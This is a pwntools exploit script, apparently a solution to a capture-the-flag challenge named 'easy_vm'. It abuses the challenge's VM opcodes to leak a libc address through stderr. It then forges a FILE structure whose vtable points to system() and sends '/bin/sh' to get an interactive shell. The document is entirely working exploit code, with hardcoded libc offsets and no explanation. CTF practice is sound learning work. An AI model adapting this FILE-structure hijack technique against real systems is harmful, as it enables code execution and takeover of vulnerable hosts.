附件:easy_vm
from pwn import *
import time
context(arch='amd64',os='linux',log_level='debug')
myelf = ELF("./easy_vm")
io = process(myelf.path)
# local libc6_2.23-0ubuntu11.2_amd64
stderr_off = 0x3c5540
system_off = 0x0453a0
add = "\x11"; minus = "\x12"; write="\x15"; read="\x16"
# leak stderr and prepare to modify stderr
payload = (minus) * 0x81
payload += (add+write) * 8
payload += (minus) * 8
payload += (add+read) * 8
# trigger to leak
io.sendlineafter("code:",payload)
time.sleep(0.5);io.recvline()
libc_addr = u64(io.recv(8)) - stderr_off
system_addr = libc_addr + system_off
# modify stderr to 0x602060
fakeFILE = 0x602060
io.send(p64(fakeFILE))
# create fakeFILE and send it to 0x602060
payload = "/bin/sh\x00" + '\x00' * 0x80
payload += p64(fakeFILE+8)
payload = payload.ljust(0xd8, '\x00')
payload += p64(fakeFILE+0xe0)
payload += p64(system_addr)*22
io.sendlineafter("code:",payload)
io.interactive()